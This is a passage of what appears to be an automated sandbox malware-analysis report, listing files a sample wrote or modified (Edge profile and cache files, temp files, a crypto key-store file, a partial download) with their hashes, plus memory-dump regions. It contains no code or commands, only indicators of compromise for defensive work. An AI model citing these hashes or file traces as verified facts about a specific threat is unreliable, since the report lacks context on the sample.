| SHA512 | 76c16c3f49ed8d2b28f5822792b2ad8454790905ef248c61e671b20d00a29631d12a5b6f5bf2245d8daaced3fbdd85e0d15f60858386a6172bc5976369a4be95 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | dc1daf86bc9fddd060d6f8fb3c0a5d26 |
| SHA1 | 48d26977ca87353a2d71c6c86c20b3b3b47f9f89 |
| SHA256 | 5a067fff4215d64e3b815e5e89a98c49d2b6247fe0b0e528519139f73a898806 |
| SHA512 | d4b3597381c7135426c377d535969d1ad9943bcbddf7649a85823ff6c4cd44b456efe7ac64bae01fcc2724bea425538ca35a0247fab9086b19e64e9f3c50ddcf |
C:\Users\Admin\AppData\Local\Temp\vbc9D070CE68711455BA883044FA7020D0.TMP
| MD5 | 3906bddee0286f09007add3cffcaa5d5 |
| SHA1 | 0e7ec4da19db060ab3c90b19070d39699561aae2 |
| SHA256 | 0deb26dcfb2f74e666344c39bd16544fcaae1a950be704b1fd4e146e77b12c00 |
| SHA512 | 0a73de0e70211323d9a8469ec60042a6892426e30ad798a39864ba123c1905d6e22cb8458a446e2f45ec19cf0233fa18d90e5f87ec987b657a35e35a49fea3b0 |
C:\Users\Admin\AppData\Local\Temp\vbcD4C4595BBF464ABD9E10A9789A5F494B.TMP
| MD5 | 85c61c03055878407f9433e0cc278eb7 |
| SHA1 | 15a60f1519aefb81cb63c5993400dd7d31b1202f |
| SHA256 | f0c9936a6fa84969548f9ffb4185b7380ceef7e8b17a3e7520e4acd1e369234b |
| SHA512 | 7099b06ac453208b8d7692882a76baceec3749d5e19abc1287783691a10c739210f6bdc3ee60592de8402ca0b9a864eb6613f77914b76aec1fc35157d0741756 |
C:\Users\Admin\AppData\Local\Temp\vbcB007BC9CD6BE4DAA94A684C83C6A3F13.TMP
| MD5 | dac60af34e6b37e2ce48ac2551aee4e7 |
| SHA1 | 968c21d77c1f80b3e962d928c35893dbc8f12c09 |
| SHA256 | 2edc4ef99552bd0fbc52d0792de6aaa85527621f5c56d0340d9a2963cbc9eed6 |
| SHA512 | 1f1badd87be7c366221eaa184ae9b9ae0593a793f37e3c1ce2d4669c83f06de470053550890ad6781b323b201a8b9d45a5e2df5b88e01c460df45278e1228084 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1c3902e77d081d2bb46d7d3f01213854 |
| SHA1 | 8da6c7ce00743be05f8fb12794444eef1e094fd2 |
| SHA256 | 9f2fdf2035d2bbd8956cc45d079c2acd00cb1a6191bbf0d3f3630770b3d00c75 |
| SHA512 | d8dbf9121386ecf8dc9c51ea7611c98e6deafb25a5bbd4af7b574c77868b890c101437c44b373717ac2a205efc60adcd15e97b2dac6b91d1f8666faea9c7c717 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8701c1d216789991ec2a7c4dcadac34c |
| SHA1 | 7f6e8819940900776c32c75db036059b59604761 |
| SHA256 | cf160d59ca888c546f69437702096b4361cae5813bfda67a1c1ea29395a509ec |
| SHA512 | fac21bf7785fcf8d4750df010d4eb67867b7d12350b106a05fcae4c8887542c677e83aa54d94da1e8a223fe9f11dcb5145657b58f0a9d1298eb38e6b2dc7c8d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 4b923f1ec594e07b70bd44be58d7388d |
| SHA1 | 099067da68ad268d5ca532679a53bd2f7de31515 |
| SHA256 | 35d48ed070cc13a18748bc25a8fada1a7a588eaac54169683d41f2a3ef4d943c |
| SHA512 | 3152e2beb04b6676a0eb8c34f5da06f8645338b53dcdb01de47abadf938de5863c5cde94afe1eb3f1e12dcd66ddcec30a1be26b6db1f142b9ce17f5f3e91db4c |
memory/3432-1908-0x00000000026D0000-0x00000000026E4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004a
| MD5 | 87e8230a9ca3f0c5ccfa56f70276e2f2 |
| SHA1 | eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7 |
| SHA256 | e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9 |
| SHA512 | 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8 |
memory/3432-2029-0x0000000004F70000-0x0000000004F78000-memory.dmp
memory/3432-2038-0x0000000005C60000-0x0000000005C68000-memory.dmp
memory/3432-2039-0x0000000005FF0000-0x0000000006034000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f2fc95a54f8eb1a3cfd07ef4c3a2ed51 |
| SHA1 | 1555fea90c7bb4a722bc84a0cd55bf3689fcf55c |
| SHA256 | 145dbacbd3986eec6b188de6201f0f604970372decc86bb415065ca8280c3197 |
| SHA512 | 90a8d643c21431feae8736e5e17a87e7c5dff7eb7692d8a30042ad3539fc46be571376a2ac63618644a44c4d6a808a03cdc1b6d41a1404cf8bc15024bca23632 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7ab7b81afb849083874ce973a126e8d7 |
| SHA1 | 21ec079db2137e0aec2cb43e211b7b030ca7e2d1 |
| SHA256 | 0cd9a76c4f9b737147a890534bfbac6312bb1c33c50717821acc002dd98cf2db |
| SHA512 | e8cd6c64e577a7fc6c5e1c349b1612c87aaca15f9b997a3238376b068e17ec922228f58a57f0171ee7b73b59d432a1dbc9a1aeaabfe7ff32312ba7b34b55d67b |
memory/3432-2085-0x0000000006040000-0x0000000006062000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 0deb0969741727222e4cb926886547ec |
| SHA1 | fe4a0ec9cb791211f2f35561d684d22ef2bad44d |
| SHA256 | b2bf9e843bd06cca3d46b855e86c4d22c49f5f402ef07ff236058a65da089d87 |
| SHA512 | 425f501006810f40c823c5522778c866110c4c672f34ad558392f3ccbafd74f29d5200473fdb393f11bed5c8dd30b89dc284a757010752360b9198e76b63036c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000046
| MD5 | 5e40e9a6cbba17706f6a5c72a255e580 |
| SHA1 | c7a174776d564bad381ccc8511658297bab87e69 |
| SHA256 | 6e055d836df9c9e63a2366842456c035c0d0fa50f9305c8ff0ece9a5b7caffbd |
| SHA512 | 506f11ff127e246c40a02389cfc846b3fd7dd6133d74290f001525c9891f6effab282944326b2694fc5247a4fb7989ee4341649019e6e39d9b181a0daa16473b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000041
| MD5 | 2c2ea9cfcd1b7831754c4d70892901c4 |
| SHA1 | c179c5a26e5ad12ff5656dfeee0631a119d83ec4 |
| SHA256 | aadd75136ce4d127af80f7a1979e2c76cada95cdd10817f1b1e40e9bd98b8c80 |
| SHA512 | f0eb51a828fb6e281f8152502f58b12df6e9d77c1d1e0ab6883358d7b69ce2850529543d4af150f9b36498438acef12b556550c5fe94d54f5f31fda195c8ec2a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000049
| MD5 | 8af6f5d4b55eda1cb5d1964cdd45a924 |
| SHA1 | 61c66a6fccfc7dfb3f69f033fc3caefd7d734ca4 |
| SHA256 | 8365243ca8225f7b04b3c720a76c963638ba5eba0c6c0819347c4236dcc1d8e6 |
| SHA512 | 2adbda4efd69f977ac4fa4095d6c47bc6ced68b36409d2ce689ee05229275e70225fcaab19d76c7a8d2718c125940553ffe00d0393756aea26351d8c3f976192 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004d
| MD5 | 4a7f9e583de3b6f609372e8e427d7168 |
| SHA1 | 99a68212286d9cfc51695824060e92b06ca4a233 |
| SHA256 | b582ae8d7d75c93bbe36c562bd6d7116feb53312864584c10c4c89dc6df024e8 |
| SHA512 | e7dcb58e57c63fc3e3ece961ba69d4d4d45063b8249b49608378ee6e7d3e6976fecedbbc2c6f5c65617d56ba2ad644b1bbdb44db2530e6ba57aecc128d711f4e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000051
| MD5 | 34d5015941e4901485c7974667b85162 |
| SHA1 | cf032e42cf197dcc3022001a0bde9d74eb11ac15 |
| SHA256 | 5c166a5d40aeefd0679a14f95e47ff28824e66abba82adfa30be41803cc25632 |
| SHA512 | 42cef1d6847f535a6e8afc0469b9f5ef79ce4ab21512ac7eeda8ef9667d5f24bb33b30aba9a29824b3d853d41d4addf6bdee2042cf4fbd0a033b61657c671f0c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000053
| MD5 | 360c9e5124d08b94d5b98e52ad63b2ab |
| SHA1 | 9068fdba4ce6a724245a2039b7132270cb0e26f8 |
| SHA256 | 1c2385886538315d081ee2ab58207bf0dc9f10ae8c723924d898bee0fbc41264 |
| SHA512 | eb7904a3bce0b32757b38512270e6d4ce3f165b0b6e932ff8cbe20493f51ec504e84e8840f37f80af51371c10c4b49f95ab6e9c2f43bad821562f3246f83b8fc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000050
| MD5 | 027492533336b7f954ad71bc851c7932 |
| SHA1 | caed6610d7ea2ed9fc1f3c3b33ed66585d579c34 |
| SHA256 | c36d01e5d025656a92499e5aef676720c44287a62f94e3c7b8342ed7cebb06f2 |
| SHA512 | bec577cd51e7953b5bb843e1bf44c7aab038c1b53ea5645c6c95793a3bb3c79745c3cc15ff7fb298d80a76e00cb9b89e62304fb431e56596619b899c7e3bb173 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000052
| MD5 | 1b2731006f2b2597b02859e501bc2d4c |
| SHA1 | 118d27a703cef3fb083593a56bbc93e62420f30a |
| SHA256 | 59dc184cbc1a318493460d1d78999cfdaaaac9a457b5a3a02c2567dfa17314bd |
| SHA512 | f7452f91afe2fbfcb04f80dc7b051d874224de8790bbc53858678332a6b49f7295a15989a587811e1e8fb58a38625ec3e15657d88a367fd50d5b201d7abbe90c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004b
| MD5 | 82a5802bfaf801992d1fbf5c6ab89ff1 |
| SHA1 | c4ec3eacd29f449dfe675c237c39d469d0203b02 |
| SHA256 | 5cc0be28e965f6531ad34a2186dcef0a74e0dea87fea7b1d671373a50296d3c2 |
| SHA512 | 1996d1eca4cb94c164a8fc29041511a45139223119348d6b6a0bf5868d0af856ede84075358bda1bff4c62d68e69bac7ae01541e9cce82c5b66d77d614ebcbff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004e
| MD5 | b45d9f9615f223fd8783b6bac8a25a1e |
| SHA1 | dd1fb7c57ce95f1e79aea49441a792f9006fbee6 |
| SHA256 | 83a5fc947c15e989a130be259216a4eb86b060e7d9fa50f90a08032ae7210d70 |
| SHA512 | 45f08ecea250b0a81cee07156f97ddbb01e355b62c1f7e7bf6d5efa5cfb6dec089622b4bf724859c966a818af3c597b2ec1b4507d27f7cabf5e0913dd513507e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004f
| MD5 | 027fec7d71bdf1f49de3dfe3e876c86a |
| SHA1 | 4e1a8c8bbf3778658fa24131d35773ae11bf4799 |
| SHA256 | 399559ee24d67fa51a741046e2403ce639d1aba984e8a0b2ac3e78fd53e24251 |
| SHA512 | cdaa9ef42368d0cd2d8f4237b9a8b9eca178ecfdeb9cf2931bbd165f985a8be16590c0dce016c685c0fc9c5829478784d60ab7eb46dbc3104d5afc7dd60e6932 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004c
| MD5 | cffeb8b898c51661efc2d9d6acd804be |
| SHA1 | 0999d91f32493d280c3251607b682926b518824b |
| SHA256 | 541127ae595e23452ea2253dbe42537eaff1108310fb21ebfc84e2d77510b61b |
| SHA512 | 3c634047adeacc5ab0d7ad94f6c42cdd30cb64b5263d1bbfa7e015770c6309dfeae568b4acac7ae08f26bcf89d7951181a5d37056ff9116348f078b707be1b6d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005d
| MD5 | a4f3afc86190a2d47f56664367af370e |
| SHA1 | 57613bcb2a288ef2508e847e7ba35d52f2e87de5 |
| SHA256 | 52fd14eb766bc6676dd81e3bb50a4dad1891bb9a47e38c3ec620aa6c2b487c42 |
| SHA512 | bae75c59141ee60ef1fc2c745117fafea3d386b64f2f67c1022909f295228578bfc5e5e49de5a2f2efd57e75affc0a7d09fbee8fa50aadd82aff446773fc690e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f5d790bb5957e8994c18c98636e79b41 |
| SHA1 | d42d0a32316594ab50f0acda77138502b8df6267 |
| SHA256 | 52a35f862b2cebeb7436ad443d7a2e327f6c5f49536d3fe88fe5c1e853fd13f0 |
| SHA512 | d39e2d39594b4bd89951f5fc0848c3736a2358599afd522c1badc584541250458dadcbf973124dd0b0675f412ee013bb946501a6b670fb00fb10c0d3ee05068e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 451756ecc7df8f90b1f643a4fbd82087 |
| SHA1 | 2f87d0e62d60052498038678a54c1debefce191e |
| SHA256 | 03e367ef4fda6ab445a89842aa4fa7e8bfce124096ddd4f8b69f105076e8a2d2 |
| SHA512 | ab99469d587ecbedafc2056cd50120b01379cdd42734f97e2bf821ceb08b61adeaadcb38aae016488614a79fb40ef952cdc3343f6a0785150f72dd9b4d6f2975 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000057
| MD5 | 79ffcf947dd8385536d2cfcdd8fcce04 |
| SHA1 | a9a43ccbbb01d15a39fac57fa05290835d81468a |
| SHA256 | ffc11b830ad653e7a9d4257c7cd7a8056db5e7d7e89439b8fd67d1207b1729bf |
| SHA512 | 3dc82ecb2abc8c567434666a9162cc188de669927c3dada6392d8bd97d5e746f1ed350e1a02ec016ee2b1dc8a9cc5c71c553f2ef1293d6793800c276560859a6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000056
| MD5 | ddb81d0edec318bfb9df95796546e2c8 |
| SHA1 | 96b5ca69ec7229906ce3721c6188a82983d30794 |
| SHA256 | 4ff16b6fcfea4587f8e3bdcec3ba50e39a56808fa2af92223fd486ddca6be02a |
| SHA512 | fe382547be845ddd7fec0632b10163517e96064cac66c80628533fbc1ff90d8581a7ce5e81cc07038b46d3aa76210d4f502d21e55a5b9aa2af74768eeb7f5b54 |
memory/1928-2323-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1928-2334-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6eaf7aa6867aa020168293588f568ea6 |
| SHA1 | e3a171d99d399457feb6ac869b28774ebb083238 |
| SHA256 | 34b4eba2ad374a54d68a7a1e02770edee7799a93eb5a9326d32589555391a40b |
| SHA512 | 96f4866d58e54df65ebeb4fd25871f28c172989225e4f799cd77292d39b709b96ff54d5d2445c1d1c60d7bc4c5f88ea43f304785bc611346e8c3be0701e5b47f |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1045960512-3948844814-3059691613-1000\0f5007522459c86e95ffcc62f32308f1_a4172161-d53d-48af-8f36-a00b057e74d4
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
memory/1928-2367-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d5c2e19dd82178c535ddc2055e859da7 |
| SHA1 | 05ab65bda71a875d12f9eabaf83753b5c0941005 |
| SHA256 | 780a647f57d1247d528f998c62d5e2c2deed47eed13b76ea3b191764791b2957 |
| SHA512 | 051d7e655bf82fc696f4ac353e9edd59c1f3e2bd5ffec9d8a5579f3df6d576a6b6fd066d5c418d601df1a924d628e03942cf47ad0e31710fd8b6f4118beea573 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8d68bec28d0cf0f50446abd8462874ec |
| SHA1 | 16b896994557d410a8fdc86bb81cfaebbba93d7d |
| SHA256 | 8f00974dbf9e74c0c7743cdb322f75ab5ba0096325ce7797c1d0bcffc6f5b985 |
| SHA512 | 517ea13903d46944d1643ea8d46a064e8e0d48c4d50540ed862c052ea8da009f4f87aace54edf946dc9429fdb7e2a60ff019013a3606398624753f46d9264366 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 63603e12cc00364228fcb6928a8b035b |
| SHA1 | b557fe336f4f7d02a41e8eabf9524a714c2f954e |
| SHA256 | 408be20e90909ec9eca6852ffd4d6dd254fae9d42deee24b97421639b7aa6cb0 |
| SHA512 | c289e8139144279a7a68f486d02f811337b9f108a3d2100d8c93c33b5c033966683b2420df27b9d398dbd134278c418d6dce0e252ef303e3a1284beba36c7912 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005e
| MD5 | 0fe9527ce6a6464c8417949dca101972 |
| SHA1 | 92e3d746ef23e80ecdee68910b64030bddaa7a9a |
| SHA256 | d9029d87aae61f32f6ea1f9bace4b63671b89d07ff8173e376d4054078c19669 |
| SHA512 | 39914909702417bfae6e411d2c59acc294961e8a722a87862301f997dcf3ae3a535681045b68e5b79bd970bdae428ca5c1aa33c5115195a919622e6265c6163d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | c889c00042ea14100a1cc3546ccd48d0 |
| SHA1 | 9a9c96e602e22bcbb8a57b771827675d3536d3e9 |
| SHA256 | e420c99e48709758239cc8bd01c07c3c7b74ff2408e5b682fd28ddd1a79aae6e |
| SHA512 | 483926d4953480a6ebb75dbabfb7652534bf86c0e73f6d5ccb0038e5d759e10938eac3bc5e21b864562861081d54ae1da6497e051ad8da70c3845ce53ca2a5be |
memory/5616-2446-0x0000015CDBDB0000-0x0000015CDBDD2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lpx1rnpp.qtz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1045960512-3948844814-3059691613-1000\0f5007522459c86e95ffcc62f32308f1_a4172161-d53d-48af-8f36-a00b057e74d4
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
memory/1928-2462-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b1f059a0a84a51c8a3788e2de3bdfbac |
| SHA1 | 29ce4785d096049984063a610e35fae28b1996b5 |
| SHA256 | 6e39dd61f3105f9ed26d3c8820a5f94c9bf52f93b8120d2503abec9cb8705a37 |
| SHA512 | 2f05d2e170dc3f109f67ccbccdd8dda29cf19d69490a788662ca1b385343ed19bdcf5a38b4b5aa2f1fbf43263d97059f28f998f7cdad43443e174adf7ed5fbdf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3293e71212b01f418c7420e99763ef1a |
| SHA1 | b2acc8e9167163c63d0f0bb1a8e403797b494e4a |
| SHA256 | f174a9a16a2d2fda6bf495e1c8b1acbf4bcf681fd314df1772547f46342d57ff |
| SHA512 | 41dbbe75d85f613d6d67fb398071ac1fd4e8ce47b9cabcabb47725bb9dd3a0d3f06a0527aa8629ccf5e18b675445eae58779ef08d17bac504b70f00a5142c46b |
C:\Users\Admin\Downloads\Unconfirmed 106716.crdownload
| MD5 | 82ab84eccc0916a2ad730e01fc946cd0 |
| SHA1 | 06940355a01b3b6bbda3e32e4825d784c0e3be51 |
| SHA256 | addb1ff85e18d2922113b04e399b77907493750c22474627f6142427bdad8fb8 |
| SHA512 | 569cb0792b6d5170080d5a91b6c54a4326c842780fb79ecd2b9ba7e7a631536f176574e1758e449aeaeed03f41f36fd893108a5ca69e98626b6e02737a837883 |